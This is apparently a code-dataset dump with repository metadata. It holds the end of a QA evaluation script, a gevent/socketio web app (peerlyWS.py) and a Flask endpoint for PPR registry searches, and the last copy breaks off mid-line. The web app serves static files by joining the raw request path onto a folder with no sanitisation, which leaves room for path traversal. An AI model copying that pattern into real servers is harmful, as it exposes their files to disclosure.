"before": continue # skip this line else: statusId = sentId if parId not in dtPar: dtPar[parId] = {} dtPartLab = dtPar[parId] if participant not in dtPartLab: dtPartLab[participant] = {statusId: labels} else: dtPartLab[participant][statusId] = labels return dtPar #---------------------------------------------------------------------------------------------------------------- def findAllParticipants(lstTurkerLabels): setParticipants = set() for turkerLabels in lstTurkerLabels: for x in turkerLabels: setParticipants.add(x.participant) return setParticipants def findCreationStep(prediction_records): steps = sorted(prediction_records, key=lambda x: x.sid) #print("steps:", steps) # first step if steps[0].from_location != 'null': # not created (exists before the process) return -1 for s in steps: if s.to_location != 'null': return s.sid return -1 # never exists def findDestroyStep(prediction_records): steps = sorted(prediction_records, key=lambda x: x.sid, reverse=True) #print("steps:", steps) # last step if steps[0].to_location != 'null': # not destroyed (exists after the process) return -1 for s in steps: if s.from_location != 'null': return s.sid return -1 # never exists def location_match(p_loc, g_loc): if p_loc == g_loc: return True p_string = ' %s ' % ' '.join([stem(x) for x in p_loc.lower().replace('"','').split()]) g_string = ' %s ' % ' '.join([stem(x) for x in g_loc.lower().replace('"','').split()]) if p_string in g_string: #print ("%s === %s" % (p_loc, g_loc)) return True return False def findMoveSteps(prediction_records): ret = [] steps = 
sorted(prediction_records, key=lambda x: x.sid) # print(steps) for s in steps: if s.from_location != 'null' and s.to_location != 'null' and s.from_location != s.to_location: ret.append(s.sid) return ret #---------------------------------------------------------------------------------------------------------------- # Q1: Is participant X created during the process? def Q1(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_created = {} for participant in setParticipants: pred_creation_step = findCreationStep(predictions[pid][participant].values()) be_created[participant] = (pred_creation_step != -1) for turkerLabels in labels[pid]: # labeled as created participants lab_created_participants = [x.participant for x in turkerLabels if x.event_type == 'create'] for participant in setParticipants: tp += int(be_created[participant] and (participant in lab_created_participants)) fp += int(be_created[participant] and (participant not in lab_created_participants)) tn += int(not be_created[participant] and (participant not in lab_created_participants)) fn += int(not be_created[participant] and (participant in lab_created_participants)) return tp,fp,tn,fn # Q2: Participant X is created during the process. At which step is it created? def Q2(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their creation step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'create']: pred_creation_step = findCreationStep(predictions[pid][x.participant].values()) tp += int(pred_creation_step != -1 and pred_creation_step == x.sid) fp += int(pred_creation_step != -1 and pred_creation_step != x.sid) fn += int(pred_creation_step == -1) return tp,fp,tn,fn # Q3: Participant X is created at step Y, and the initial location is known. Where is the participant after it is created? def Q3(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their creation step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'create' and x.to_location != 'unk']: pred_loc = predictions[pid][x.participant][x.sid].to_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.to_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.to_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp, fp, tn, fn #---------------------------------------------------------------------------------------------------------------- # Q4: Is participant X destroyed during the process? 
def Q4(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_destroyed = {} for participant in setParticipants: pred_destroy_step = findDestroyStep(predictions[pid][participant].values()) be_destroyed[participant] = (pred_destroy_step != -1) for turkerLabels in labels[pid]: # labeled as destroyed participants lab_destroyed_participants = [x.participant for x in turkerLabels if x.event_type == 'destroy'] for participant in setParticipants: tp += int(be_destroyed[participant] and (participant in lab_destroyed_participants)) fp += int(be_destroyed[participant] and (participant not in lab_destroyed_participants)) tn += int(not be_destroyed[participant] and (participant not in lab_destroyed_participants)) fn += int(not be_destroyed[participant] and (participant in lab_destroyed_participants)) return tp,fp,tn,fn # Q5: Participant X is destroyed during the process. At which step is it destroyed? def Q5(labels, predictions): tp = fp = tn = fn = 0.0 # find all destroyed participants and their destroy step for pid, lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'destroy']: pred_destroy_step = findDestroyStep(predictions[pid][x.participant].values()) tp += int(pred_destroy_step != -1 and pred_destroy_step == x.sid) fp += int(pred_destroy_step != -1 and pred_destroy_step != x.sid) fn += int(pred_destroy_step == -1) return tp,fp,tn,fn # Q6: Participant X is destroyed at step Y, and its location before destroyed is known. Where is the participant right before it is destroyed? def Q6(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their destroy step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'destroy' and x.from_location != 'unk']: pred_loc = predictions[pid][x.participant][x.sid].from_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.from_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.from_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp, fp, tn, fn #---------------------------------------------------------------------------------------------------------------- # Q7 Does participant X move during the process? def Q7(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_moved = {} for participant in setParticipants: pred_move_steps = findMoveSteps(predictions[pid][participant].values()) be_moved[participant] = (pred_move_steps != []) # print(be_moved) for turkerLabels in labels[pid]: lab_moved_participants = [x.participant for x in turkerLabels if x.event_type == 'move'] for participant in setParticipants: tp += int(be_moved[participant] and (participant in lab_moved_participants)) fp += int(be_moved[participant] and (participant not in lab_moved_participants)) tn += int(not be_moved[participant] and (participant not in lab_moved_participants)) fn += int(not be_moved[participant] and (participant in lab_moved_participants)) return tp,fp,tn,fn # Q8 Participant X moves during the process. At which steps does it move? 
def Q8(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions pred_moved_steps = {} for participant in setParticipants: pred_moved_steps[participant] = findMoveSteps(predictions[pid][participant].values()) num_steps = len(predictions[pid][participant].keys()) for turkerLabels in labels[pid]: gold_moved_steps = {} for x in [x for x in turkerLabels if x.event_type == 'move']: if x.participant not in gold_moved_steps: gold_moved_steps[x.participant] = [] gold_moved_steps[x.participant].append(x.sid) for participant in gold_moved_steps: res = set_compare(pred_moved_steps[participant], gold_moved_steps[participant], num_steps) tp += res[0] fp += res[1] tn += res[2] fn += res[3] return tp,fp,tn,fn def set_compare(pred_steps, gold_steps, num_steps): setPred = set(pred_steps) setGold = set(gold_steps) tp = len(setPred.intersection(setGold)) fp = len(setPred - setGold) fn = len(setGold - setPred) tn = num_steps - tp - fp - fn return (tp, fp, tn, fn) # Q9 Participant X moves at step Y, and its location before step Y is known. What is its location before step Y? def Q9(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: for turkerLabels in labels[pid]: for x in turkerLabels: if x.event_type == 'move' and x.from_location != 'unk': pred_loc = predictions[pid][x.participant][x.sid].from_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.from_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.from_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp,fp,tn,fn # Q10 Participant X moves at step Y, and its location after step Y is known. What is its location after step Y? def Q10(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: for turkerLabels in labels[pid]: for x in turkerLabels: if x.event_type == 'move' and x.to_location != 'unk': pred_loc = predictions[pid][x.participant][x.sid].to_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.to_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.to_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp,fp,tn,fn #---------------------------------------------------------------------------------------------------------------- def main(): if len(sys.argv) != 4: sys.stderr.write("Usage: evalQA.py para-ids gold-labels system-predictions\n") sys.exit(-1) paraIds = sys.argv[1] goldPred = sys.argv[2] fnPred = sys.argv[3] qid_to_score = {} selPid = set([int(x) for x in open(paraIds).readlines()]) gold_labels = readGold(goldPred) labels = readLabels('tests/fixtures/eval/all-moves.full-grid.tsv', selPid, gold_labels) predictions = readPredictions(fnPred) blHeader = True qid = 0 for Q in [Q1, Q2, Q3, Q4, Q5, Q6, Q7, Q8, Q9, Q10]: qid += 1 tp, fp, tn, fn = Q(labels, predictions) header,results_str, results = metrics(tp,fp,tn,fn,qid) if blHeader: print("\t%s" % header) blHeader = False print("Q%d\t%s" % (qid, results_str)) qid_to_score[qid] = results[5] cat1_score = (qid_to_score[1] + qid_to_score[4] + qid_to_score[7]) / 3 cat2_score = (qid_to_score[2] + qid_to_score[5] + qid_to_score[8]) / 3 cat3_score = (qid_to_score[3] + qid_to_score[6] + qid_to_score[9] + qid_to_score[10]) / 4 macro_avg = (cat1_score + cat2_score + cat3_score) / 3 num_cat1_q = 750 num_cat2_q = 601 num_cat3_q = 823 micro_avg = ((cat1_score * num_cat1_q) + (cat2_score * num_cat2_q) + (cat3_score * 
num_cat3_q)) / \ (num_cat1_q + num_cat2_q + num_cat3_q) print("\n\nCategory\tAccuracy Score") print("=========\t=====") print(f"Cat-1\t\t{round(cat1_score,2)}") print(f"Cat-2\t\t{round(cat2_score,2)}") print(f"Cat-3\t\t{round(cat3_score,2)}") print(f"macro-avg\t{round(macro_avg,2)}") print(f"micro-avg\t{round(micro_avg,2)}") def metrics(tp, fp, tn, fn, qid): if (tp+fp > 0): prec = tp/(tp+fp) else: prec = 0.0 if (tp+fn > 0): rec = tp/(tp+fn) else: rec = 0.0 if (prec + rec) != 0: f1 = 2 * prec * rec / (prec + rec) else: f1 = 0.0 accuracy = (tp+tn) / (tp + fp + tn + fn) if qid == 8: accuracy = f1 # this is because Q8 can have multiple valid answers and F1 makes more sense here total = tp + fp + tn + fn header = '\t'.join(["Total", "TP", "FP", "TN", "FN", "Accuracy", "Precision", "Recall", "F1"]) results = [total, tp, fp, tn, fn, accuracy*100, prec*100, rec*100, f1*100] results_str = "%d\t%d\t%d\t%d\t%d\t%.2f\t%.2f\t%.2f\t%.2f" % (total, tp, fp, tn, fn, accuracy*100, prec*100, rec*100, f1*100) return (header, results_str, results) #---------------------------------------------------------------------------------------------------------------- if __name__ == "__main__": main()
16,649
0
541
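Every question above reduces to the same tp/fp/tn/fn arithmetic in metrics(); a small worked example with made-up counts, plus the set_compare() logic Q8 uses for multi-step answers:

# Made-up counts for one question.
tp, fp, tn, fn = 8.0, 2.0, 5.0, 5.0
precision = tp / (tp + fp)                          # 0.80
recall = tp / (tp + fn)                             # ~0.615
f1 = 2 * precision * recall / (precision + recall)  # ~0.696
accuracy = (tp + tn) / (tp + fp + tn + fn)          # 0.65 (Q8 reports f1 here instead)

# Q8's set_compare(): predicted move steps {2, 4} vs. gold steps {2, 3} in a 5-step paragraph.
set_pred, set_gold, num_steps = {2, 4}, {2, 3}, 5
q8_tp = len(set_pred & set_gold)           # 1
q8_fp = len(set_pred - set_gold)           # 1
q8_fn = len(set_gold - set_pred)           # 1
q8_tn = num_steps - q8_tp - q8_fp - q8_fn  # 2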
deae37deb80e55431aeffc4a40f5e13cb6af2f86
2,360
py
Python
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
from gevent import monkey; monkey.patch_all() import gevent from socketio import socketio_manage from socketio.server import SocketIOServer from socketio.namespace import BaseNamespace from socketio.mixins import RoomsMixin, BroadcastMixin from twisted.internet import reactor, task, defer from twisted.python import log from peerlyDB.network import Server import sys, signal from p2p import P2PNamespace log.startLogging(sys.stdout)
27.764706
71
0.587288
from gevent import monkey; monkey.patch_all() import gevent from socketio import socketio_manage from socketio.server import SocketIOServer from socketio.namespace import BaseNamespace from socketio.mixins import RoomsMixin, BroadcastMixin from twisted.internet import reactor, task, defer from twisted.python import log from peerlyDB.network import Server import sys, signal from p2p import P2PNamespace log.startLogging(sys.stdout) class Application(object): def __init__(self, port=8469): self.buffer = [] # Dummy request object to maintain state between Namespace # initialization. server = Server() server.listen(port) self.request = { 'queries': {}, 'kadServer' : server, 'inserts' : {}, 'port' : port, 'bootstraped' : False } gevent.spawn(self.startReactor) def startReactor(self): gevent.sleep(1) reactor.run() signal.signal(signal.SIGINT, signal.default_int_handler) def __call__(self, environ, start_response): path = environ['PATH_INFO'].strip('/') if not path: start_response('200 OK', [('Content-Type', 'text/html')]) return [open('peerlyApp/web/peerly.html').read()] #return ['<h1>Welcome. ' # 'Try the <a href="/chat.html">chat</a> example.</h1>'] if path.startswith('static/') or path == 'peerly.html': try: data = open('peerlyApp/web/'+path).read() except Exception: return not_found(start_response) if path.endswith(".js"): content_type = "text/javascript" elif path.endswith(".css"): content_type = "text/css" elif path.endswith(".swf"): content_type = "application/x-shockwave-flash" else: content_type = "text/html" start_response('200 OK', [('Content-Type', content_type)]) return [data] if path.startswith("socket.io"): socketio_manage(environ, {'': P2PNamespace}, self.request) else: return not_found(start_response) def not_found(start_response): start_response('404 Not Found', []) return ['<h1>Not Found</h1>']
1,774
5
127
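The record above wires a gevent-socketio namespace into a plain WSGI callable, but the server start itself is not shown; serving such an Application with gevent-socketio usually looks roughly like the sketch below (host, port and import path are assumptions, though 'socket.io' matches the path check in Application.__call__):

from socketio.server import SocketIOServer
from peerlyApp.peerlyWS import Application  # module path inferred from the repo layout above

if __name__ == '__main__':
    app = Application(port=8469)
    # SocketIOServer wraps a gevent WSGI server and handles /socket.io/* traffic itself.
    SocketIOServer(('0.0.0.0', 8080), app, resource='socket.io').serve_forever()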
9134aff78215faf06e32eb3662c9a17d4dfcc14c
13,671
py
Python
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
# Copyright © 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """API endpoints for executing PPR searches.""" # pylint: disable=too-many-return-statements from http import HTTPStatus from flask import current_app, g, jsonify, request from flask_restx import Namespace, Resource, cors from registry_schemas import utils as schema_utils from ppr_api.exceptions import BusinessException, DatabaseException from ppr_api.models import SearchRequest, SearchResult from ppr_api.resources import utils as resource_utils from ppr_api.services.authz import authorized, is_bcol_help, is_gov_account, is_sbc_office_account, is_staff_account from ppr_api.services.payment import TransactionTypes from ppr_api.services.payment.exceptions import SBCPaymentException from ppr_api.services.payment.payment import Payment from ppr_api.utils.auth import jwt from ppr_api.utils.util import cors_preflight API = Namespace('searches', description='Endpoints for PPR searches.') VAL_ERROR = 'Search request data validation errors.' # Validation error prefix SAVE_ERROR_MESSAGE = 'Account {0} search db save failed: {1}' PAY_REFUND_MESSAGE = 'Account {0} search refunding payment for invoice {1}.' PAY_REFUND_ERROR = 'Account {0} search payment refund failed for invoice {1}: {2}.' # Map api spec search type to payment transaction details description TO_SEARCH_TYPE_DESCRIPTION = { 'AIRCRAFT_DOT': 'Aircraft Airframe DOT Number:', 'BUSINESS_DEBTOR': 'Debtor Business Name:', 'INDIVIDUAL_DEBTOR': 'Debtor Individual Name:', 'MHR_NUMBER': 'Manufactured Home Registration Number:', 'REGISTRATION_NUMBER': 'Registration Number:', 'SERIAL_NUMBER': 'Serial/VIN Number:' } CERTIFIED_PARAM = 'certified' ROUTING_SLIP_PARAM = 'routingSlipNumber' DAT_NUMBER_PARAM = 'datNumber' BCOL_NUMBER_PARAM = 'bcolAccountNumber' @cors_preflight('POST,OPTIONS') @API.route('', methods=['POST', 'OPTIONS']) class SearchResource(Resource): """Resource for executing PPR searches.""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def post(): # pylint: disable=too-many-branches,too-many-locals """Execute a new search request using criteria in the request body.""" try: # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if not account_id: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate request against the schema. valid_format, errors = schema_utils.validate(request_json, 'searchQuery', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) # Perform any extra data validation such as start and end dates here SearchRequest.validate_query(request_json) # Staff has special payment rules and setup. 
if is_staff_account(account_id) or is_bcol_help(account_id): return staff_search(request, request_json, account_id) query = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Charge a search fee. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) transaction_type = TransactionTypes.SEARCH.value # if gov account user then check if sbc if is_gov_account(jwt): # if SBC staff user (authy, api call) then change transaction type to $10 fee is_sbc = is_sbc_office_account(jwt.get_token_auth_header(), account_id) if is_sbc: transaction_type = TransactionTypes.SEARCH_STAFF.value elif is_sbc is None: # didn't get a succesful response from auth raise BusinessException('Unable to verify possible SBC staff user before payment.', HTTPStatus.INTERNAL_SERVER_ERROR) pay_ref = payment.create_payment(transaction_type, 1, None, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED except SBCPaymentException as pay_exception: return resource_utils.pay_exception_response(pay_exception, account_id) except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) @cors_preflight('PUT,OPTIONS') @API.route('/<path:search_id>', methods=['PUT', 'OPTIONS']) class SearchDetailResource(Resource): """Resource for processing requests to update the search selection (UI autosave).""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def put(search_id): """Execute a search selection update request replacing the current value with the request body contents.""" try: if search_id is None: return resource_utils.path_param_error_response('search ID') # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if account_id is None: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate schema. valid_format, errors = schema_utils.validate(request_json, 'searchSummary', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) search_request = SearchRequest.find_by_id(search_id) if not search_request: return resource_utils.not_found_error_response('searchId', search_id) # Save the updated search selection. 
search_request.update_search_selection(request_json) return jsonify(search_request.updated_selection), HTTPStatus.ACCEPTED except DatabaseException as db_exception: return resource_utils.db_exception_response(db_exception, account_id, 'PUT search selection update') except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) def staff_search(req: request, request_json, account_id: str): """Execute a staff search with special payment validation and methods.""" payment_info = build_staff_payment(req, account_id) # bcol help is no fee; reg staff can be no fee. # FAS is routing slip only. # BCOL is dat number (optional) and BCOL account number (mandatory). # All staff roles including SBC can submit no fee searches. if ROUTING_SLIP_PARAM in payment_info and BCOL_NUMBER_PARAM in payment_info: return resource_utils.staff_payment_bcol_fas() if CERTIFIED_PARAM in payment_info: request_json['certified'] = True query: SearchRequest = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Always create a payment transaction. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) # staff payment pay_ref = payment.create_payment_staff_search(payment_info, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. 
current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED def build_staff_payment(req: request, account_id: str): """Extract payment information from request parameters.""" payment_info = { 'transactionType': TransactionTypes.SEARCH_STAFF_NO_FEE.value } if is_bcol_help(account_id): return payment_info certified = req.args.get(CERTIFIED_PARAM) routing_slip = req.args.get(ROUTING_SLIP_PARAM) bcol_number = req.args.get(BCOL_NUMBER_PARAM) dat_number = req.args.get(DAT_NUMBER_PARAM) if certified is not None and isinstance(certified, bool) and certified: payment_info[CERTIFIED_PARAM] = True elif certified is not None and isinstance(certified, str) and \ certified.lower() in ['true', '1', 'y', 'yes']: payment_info[CERTIFIED_PARAM] = True if routing_slip is not None: payment_info[ROUTING_SLIP_PARAM] = str(routing_slip) if bcol_number is not None: payment_info[BCOL_NUMBER_PARAM] = str(bcol_number) if dat_number is not None: payment_info[DAT_NUMBER_PARAM] = str(dat_number) if ROUTING_SLIP_PARAM in payment_info or BCOL_NUMBER_PARAM in payment_info: if CERTIFIED_PARAM in payment_info: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED.value else: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF.value elif CERTIFIED_PARAM in payment_info: # Verify this is allowed. payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED_NO_FEE.value return payment_info def get_payment_details(search_request, search_type): """Extract the payment details value from the search request criteria.""" details = { 'label': TO_SEARCH_TYPE_DESCRIPTION[search_type] } if search_request.search_type == SearchRequest.SearchTypes.BUSINESS_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['business'] elif search_request.search_type == SearchRequest.SearchTypes.INDIVIDUAL_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['last'] + ', ' +\ search_request.search_criteria['criteria']['debtorName']['first'] else: details['value'] = search_request.search_criteria['criteria']['value'] return details
47.634146
116
0.684661
# Copyright © 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """API endpoints for executing PPR searches.""" # pylint: disable=too-many-return-statements from http import HTTPStatus from flask import current_app, g, jsonify, request from flask_restx import Namespace, Resource, cors from registry_schemas import utils as schema_utils from ppr_api.exceptions import BusinessException, DatabaseException from ppr_api.models import SearchRequest, SearchResult from ppr_api.resources import utils as resource_utils from ppr_api.services.authz import authorized, is_bcol_help, is_gov_account, is_sbc_office_account, is_staff_account from ppr_api.services.payment import TransactionTypes from ppr_api.services.payment.exceptions import SBCPaymentException from ppr_api.services.payment.payment import Payment from ppr_api.utils.auth import jwt from ppr_api.utils.util import cors_preflight API = Namespace('searches', description='Endpoints for PPR searches.') VAL_ERROR = 'Search request data validation errors.' # Validation error prefix SAVE_ERROR_MESSAGE = 'Account {0} search db save failed: {1}' PAY_REFUND_MESSAGE = 'Account {0} search refunding payment for invoice {1}.' PAY_REFUND_ERROR = 'Account {0} search payment refund failed for invoice {1}: {2}.' # Map api spec search type to payment transaction details description TO_SEARCH_TYPE_DESCRIPTION = { 'AIRCRAFT_DOT': 'Aircraft Airframe DOT Number:', 'BUSINESS_DEBTOR': 'Debtor Business Name:', 'INDIVIDUAL_DEBTOR': 'Debtor Individual Name:', 'MHR_NUMBER': 'Manufactured Home Registration Number:', 'REGISTRATION_NUMBER': 'Registration Number:', 'SERIAL_NUMBER': 'Serial/VIN Number:' } CERTIFIED_PARAM = 'certified' ROUTING_SLIP_PARAM = 'routingSlipNumber' DAT_NUMBER_PARAM = 'datNumber' BCOL_NUMBER_PARAM = 'bcolAccountNumber' @cors_preflight('POST,OPTIONS') @API.route('', methods=['POST', 'OPTIONS']) class SearchResource(Resource): """Resource for executing PPR searches.""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def post(): # pylint: disable=too-many-branches,too-many-locals """Execute a new search request using criteria in the request body.""" try: # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if not account_id: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate request against the schema. valid_format, errors = schema_utils.validate(request_json, 'searchQuery', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) # Perform any extra data validation such as start and end dates here SearchRequest.validate_query(request_json) # Staff has special payment rules and setup. 
if is_staff_account(account_id) or is_bcol_help(account_id): return staff_search(request, request_json, account_id) query = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Charge a search fee. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) transaction_type = TransactionTypes.SEARCH.value # if gov account user then check if sbc if is_gov_account(jwt): # if SBC staff user (authy, api call) then change transaction type to $10 fee is_sbc = is_sbc_office_account(jwt.get_token_auth_header(), account_id) if is_sbc: transaction_type = TransactionTypes.SEARCH_STAFF.value elif is_sbc is None: # didn't get a succesful response from auth raise BusinessException('Unable to verify possible SBC staff user before payment.', HTTPStatus.INTERNAL_SERVER_ERROR) pay_ref = payment.create_payment(transaction_type, 1, None, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED except SBCPaymentException as pay_exception: return resource_utils.pay_exception_response(pay_exception, account_id) except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) @cors_preflight('PUT,OPTIONS') @API.route('/<path:search_id>', methods=['PUT', 'OPTIONS']) class SearchDetailResource(Resource): """Resource for processing requests to update the search selection (UI autosave).""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def put(search_id): """Execute a search selection update request replacing the current value with the request body contents.""" try: if search_id is None: return resource_utils.path_param_error_response('search ID') # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if account_id is None: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate schema. valid_format, errors = schema_utils.validate(request_json, 'searchSummary', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) search_request = SearchRequest.find_by_id(search_id) if not search_request: return resource_utils.not_found_error_response('searchId', search_id) # Save the updated search selection. 
search_request.update_search_selection(request_json) return jsonify(search_request.updated_selection), HTTPStatus.ACCEPTED except DatabaseException as db_exception: return resource_utils.db_exception_response(db_exception, account_id, 'PUT search selection update') except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) def staff_search(req: request, request_json, account_id: str): """Execute a staff search with special payment validation and methods.""" payment_info = build_staff_payment(req, account_id) # bcol help is no fee; reg staff can be no fee. # FAS is routing slip only. # BCOL is dat number (optional) and BCOL account number (mandatory). # All staff roles including SBC can submit no fee searches. if ROUTING_SLIP_PARAM in payment_info and BCOL_NUMBER_PARAM in payment_info: return resource_utils.staff_payment_bcol_fas() if CERTIFIED_PARAM in payment_info: request_json['certified'] = True query: SearchRequest = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', 